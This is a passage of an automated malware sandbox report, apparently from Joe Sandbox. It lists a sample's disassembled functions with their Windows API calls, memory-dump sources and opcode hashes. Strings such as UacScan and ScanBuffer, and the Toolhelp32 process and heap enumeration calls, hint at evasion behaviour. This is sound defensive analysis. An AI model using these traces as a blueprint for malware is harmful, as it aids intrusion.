                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,027F0714,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,UacInitialize), ref: 027D7E67
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
                                                                                        • Instruction ID: fca83eea63b30276686a1553a8d7284d7c7d127178471c9fdfb4b01191db4ade
                                                                                        • Opcode Fuzzy Hash: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
                                                                                        • Instruction Fuzzy Hash: D8C02BF13012000A5E5865FC3CCD24953EE0D042383640F21F4F8CF2E2D332E8A32810
                                                                                        Function 027D7E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,027F3891,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,Initialize), ref: 027D7E8B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
                                                                                        • Instruction ID: 20ec2e0469e27167eba0039328b88337e2119cd09d4c02bdc5d5c1f3dff57a73
                                                                                        • Opcode Fuzzy Hash: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
                                                                                        • Instruction Fuzzy Hash: C0C02BF33112000E1E64A7FC2CCC21943ED09841347601F21F478CB3C1D326E8232820
                                                                                        Function 027D4C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID:
                                                                                        • API String ID: 3341692771-0
                                                                                        • Opcode ID: 8f59a01dc2def63d57c38a763d75440e0a15885831eefe8f9f31431ff0765006
                                                                                        • Instruction ID: 12f595c1628110c02b86e170e4ba736ceb2ba8dbc68d944ddfa7e6941ce41d20
                                                                                        • Opcode Fuzzy Hash: 8f59a01dc2def63d57c38a763d75440e0a15885831eefe8f9f31431ff0765006
                                                                                        • Instruction Fuzzy Hash: EFC012A660123057EB215699ECC475262EC9B05295B1404A1D408D7250E370980046A0
                                                                                        Function 027D4C9C Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(027EF798), ref: 027D4C6E
                                                                                        • SysReAllocStringLen.OLEAUT32(027FC858,027EF798,000000B4), ref: 027D4CB6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 344208780-0
                                                                                        • Opcode ID: 60f216499253b9dff2cac0f6af8fdc80ea07a63062dd34f7668bbc85ccb701f1
                                                                                        • Instruction ID: a267a6afe7a81ee47134d846e8b06003ed0badd2e95e039256669834d837e891
                                                                                        • Opcode Fuzzy Hash: 60f216499253b9dff2cac0f6af8fdc80ea07a63062dd34f7668bbc85ccb701f1
                                                                                        • Instruction Fuzzy Hash: 2AD080743011056DAF3C8B27D578D37717AD9D12057CCCF5D980E5A264D735D401CA70
                                                                                        Function 027FC534 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • timeSetEvent.WINMM(00002710,00000000,027FC528,00000000,00000001), ref: 027FC544
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Eventtime
                                                                                        • String ID:
                                                                                        • API String ID: 2982266575-0
                                                                                        • Opcode ID: 2306ddbc62d4188e185a27de53064066f351e1047fa201482fbf09ca147a7d87
                                                                                        • Instruction ID: dd6fd052a46f5c46d904abcc1999f8f38f3d5a096667b33c43ae5821f7877832
                                                                                        • Opcode Fuzzy Hash: 2306ddbc62d4188e185a27de53064066f351e1047fa201482fbf09ca147a7d87
                                                                                        • Instruction Fuzzy Hash: FFC092F17C93043EFA1296AA5CC2F7315EDD709B01F24046AB702EE2D1D2F249108A20
                                                                                        Function 027D4C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 027D4C3F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 2525500382-0
                                                                                        • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                        • Instruction ID: d43cdc19a0f65747f7beffae656f74d2667a030949ea38f71018b38ad5659b80
                                                                                        • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                        • Instruction Fuzzy Hash: FDB0123430920115FB1823A38F24733007D0B40286FC404919F1CD80D6FB11D0038C35
                                                                                        Function 027D4C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 027D4C57
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID:
                                                                                        • API String ID: 3341692771-0
                                                                                        • Opcode ID: ae581ebb92addf67a3a65b39d43af7ed10248a7cf14a7419a8a23d03648cf3b3
                                                                                        • Instruction ID: fff429f9d8f6520fbedf56dcf1241ac09eccca792774b564aaf722ce67a10c45
                                                                                        • Opcode Fuzzy Hash: ae581ebb92addf67a3a65b39d43af7ed10248a7cf14a7419a8a23d03648cf3b3
                                                                                        • Instruction Fuzzy Hash: EAA022AC2003030A8F0B33AC803023F22333FC23003C8C8E882080A0008F3B8000AC30
                                                                                        Function 027D15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,027D1A03,?,027D2000), ref: 027D15E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 09ed435df44834b811771051a7cd9ab1f27a8f59dc3d495ae3c6c85f46c6c1c3
                                                                                        • Instruction ID: e1184fa4abd0b97953f3034a31af54fbf401977bc2cd0eabc17bcb21de2aef28
                                                                                        • Opcode Fuzzy Hash: 09ed435df44834b811771051a7cd9ab1f27a8f59dc3d495ae3c6c85f46c6c1c3
                                                                                        • Instruction Fuzzy Hash: AFF049F4B413004FEF15CFB999443027AE2E789344F55C579D609DB3C8E77184098B20
                                                                                        Function 027D1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,027D2000), ref: 027D16A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 4970d546093d5fc92728a2b9262876d9ea5c6c38dc738b8063b007c3852547b9
                                                                                        • Instruction ID: 0c2e52c6011463738cbc677182f28eb649d4bfd490d97f78a9613f6630cd6335
                                                                                        • Opcode Fuzzy Hash: 4970d546093d5fc92728a2b9262876d9ea5c6c38dc738b8063b007c3852547b9
                                                                                        • Instruction Fuzzy Hash: 0DF0F0FAB006946FD3218E5A9C80782BBA0FB00310F054139EA8897381D770A8148B98
                                                                                        Function 027D16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,027D1FE4), ref: 027D1704
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: 529cea1f34f1dd982efc063346d2f3e8059b9581477db7b0212ac4663fadcbd6
                                                                                        • Instruction ID: 46ceda6d32f9ccf448e78ecbb1ba665aef2c3a1401629c743302262c7696db95
                                                                                        • Opcode Fuzzy Hash: 529cea1f34f1dd982efc063346d2f3e8059b9581477db7b0212ac4663fadcbd6
                                                                                        • Instruction Fuzzy Hash: 47E08C79300302AFE7205A7A9D84B12BBE8EB48664F654476F649DB292D6A0E8148B74

                                                                                        Non-executed Functions

                                                                                        Function 027EA9D4 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,027EAC5B,?,?,027EACED,00000000,027EADC9), ref: 027EA9E8
                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 027EAA00
                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 027EAA12
                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 027EAA24
                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 027EAA36
                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 027EAA48
                                                                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 027EAA5A
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 027EAA6C
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 027EAA7E
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 027EAA90
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 027EAAA2
                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 027EAAB4
                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 027EAAC6
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 027EAAD8
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 027EAAEA
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 027EAAFC
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 027EAB0E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                        • API String ID: 667068680-597814768
                                                                                        • Opcode ID: 4d6e3a5715cfad21ba401b3135cb9358c706162439a926dd5349d860b79d8e33
                                                                                        • Instruction ID: 9d51ec395623c0640dcce321922df8ba51099ba4cb8645341354e639782c0f7b
                                                                                        • Opcode Fuzzy Hash: 4d6e3a5715cfad21ba401b3135cb9358c706162439a926dd5349d860b79d8e33
                                                                                        • Instruction Fuzzy Hash: F03180F8E817509FEF11DFA4A989B2537BEEB197047014DA6A402CF244F6749454CF61
                                                                                        Function 027D5908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,027D737C,027D0000,027FE790), ref: 027D5925
                                                                                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 027D593C
                                                                                        • lstrcpynA.KERNEL32(?,?,?), ref: 027D596C
                                                                                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,027D737C,027D0000,027FE790), ref: 027D59D0
                                                                                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,027D737C,027D0000,027FE790), ref: 027D5A06
                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,027D737C,027D0000,027FE790), ref: 027D5A19
                                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,027D737C,027D0000,027FE790), ref: 027D5A2B
                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027D737C,027D0000,027FE790), ref: 027D5A37
                                                                                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027D737C,027D0000), ref: 027D5A6B
                                                                                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027D737C), ref: 027D5A77
                                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 027D5A99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                        • API String ID: 3245196872-1565342463
                                                                                        • Opcode ID: 423660b964baf66d002a572b6533efa1cfb56378c075e079d35e0dbdceaf734e
                                                                                        • Instruction ID: fa0362b90c481e39caf5ba907a3971f07131c307d53f358b837822d587a9384b
                                                                                        • Opcode Fuzzy Hash: 423660b964baf66d002a572b6533efa1cfb56378c075e079d35e0dbdceaf734e
                                                                                        • Instruction Fuzzy Hash: 38416E71E00629AFDB11DBE8CC88ADEBBBDAF48350F8445A5A158E7241E770DF448F64
                                                                                        Function 027D5BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027D5BE8
                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027D5BF5
                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027D5BFB
                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027D5C26
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5C6D
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5C7D
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5CA5
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5CB5
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027D5CDB
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027D5CEB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                        • API String ID: 1599918012-2375825460
                                                                                        • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                        • Instruction ID: 2328fdd2a42f158279deea1a8256b3748bbdd6d12dabc866747bbf1b13157308
                                                                                        • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                        • Instruction Fuzzy Hash: BE31A471F4126D2AFB26D6F88C89FDF77BD9B04380F8405A1960CE6181DB749E848FA0
                                                                                        Function 027D7FD4 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 027D7FF5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: DiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 1705453755-0
                                                                                        • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                        • Instruction ID: be67af936027537699449efc92ad8d2560a4f2e745c51d810b79d09f1f3a49af
                                                                                        • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                        • Instruction Fuzzy Hash: 3611DEB5E00209AF9B05CF99C881DAFF7F9FFC9304B54C569A509E7254E671AA018BA0
                                                                                        Function 027DA7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DA7E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
